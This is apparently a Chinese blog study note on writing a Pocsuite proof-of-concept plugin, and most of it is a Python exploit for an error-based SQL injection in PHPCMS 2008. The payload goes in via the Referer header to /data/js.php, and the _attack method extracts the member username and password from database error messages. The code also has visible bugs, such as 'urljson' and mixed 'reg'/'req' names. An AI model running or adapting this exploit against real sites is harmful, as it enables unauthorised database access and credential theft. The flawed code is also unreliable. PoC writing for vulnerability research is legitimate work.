在这里,首先向安全圈最大的娱乐公司,某404致敬。
参考博文 https://www.seebug.org/help/dev 向seebug平台及该文原作者致敬,虽然并不知道是谁
长话短说其实,可自由发挥的部分并不多,以原博文中的SQL注入的例子(web应用漏洞)来记录自己的学习心得笔记。
感觉整篇POC能自己发挥的并不多,从代码上看,几乎90%的代码照要求填写即可,自由发挥的部分,基本就是构造URL payload,发包匹配回显。嗯,就酱。
镣铐起舞更美是不,哎,其他的照抄吧,自由发挥的部分主要在于漏洞研究,不在于开发代码部分。抽时间还是要写一写的,想要个自己的站点balabala
1 #!/usr/bin/env python 2 # -*- coding:utf-8 -*- 3 4 #import system lib files 5 import os#并没有用啊,我只是很喜欢这个库的名字,觉得很好看 6 import re 7 import sys#并没有用啊,我还是很喜欢这个库的名字,觉得很好看 8 import json#并没有用啊,我还是很喜欢这个库的名字,觉得很好看 9 import urlparse 10 11 #import pocsuite lib file下面是要用到的pocsuite框架的一些函数或者类 12 from pocsuite.net import reg 13 from pocsuite.poc import POCBase 14 from pocsuite.utils import register 15 16 class mytest_poc(POCBase): 17 vulID = '62274' #漏洞编号-ssvid 18 version = 1 #poc version 19 author = ["no.1 author","no.2 author",...] #author name list 20 vulDate = '2011-11-21' #vul discory(report) date 21 createDate = '2015-09-23' #poc create date 22 updateDate = '2015-09-23' #poc update date 23 referercens = ["http://www.seebug.org/vuldb/ssvid-62274"] #参考文献 24 name = '_62274_phpcms_2008_place_sql_inj_PoC' #poc script name 25 appPowerLink = 'http://www.phpcms.cn' #app vendor link 26 appName = 'PHPCMS' 27 appVersion = '2008' 28 vulType = 'SQL Injection' # 漏洞类型 29 desc = """balabala""" #描述 30 samples = ['http://10.1.200.28/'] 31 32 def _attack(self): 33 result = {} 34 vulurl = urlparse.urljson(self.url, '/data/js.php?id=1') 35 payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#" 36 head = { 37 'Referer': payload 38 } 39 resp = reg.get(vulurl,headers=head) 40 if resp.status_code == 200: 41 match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', resp.content, re.I | re.M) 42 if match_result: 43 result['AdminInfo'] = {} 44 result['AdminInfo']['Username'] = match_result.group(1) 45 result['AdminInfo']['Password'] = match_result.group(2) 46 return self.parse_attack(result) 47 48 def _verify(self): 49 result = {} 50 vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1') 51 payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#" 52 head = { 53 'Referer': payload 54 } 55 resp = req.get(vulurl, headers=head) 56 if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content: 57 result['VerifyInfo'] = {} 58 result['VerifyInfo']['URL'] = vulurl 59 result['VerifyInfo']['Payload'] = payload 60 61 return self.parse_attack(result) 62 63 def parse_attack(self, result): 64 output = Output(self) 65 if result: 66 output.success(result) 67 else: 68 output.fail('Internet nothing returned') 69 return output 70 71 register(mytest_poc)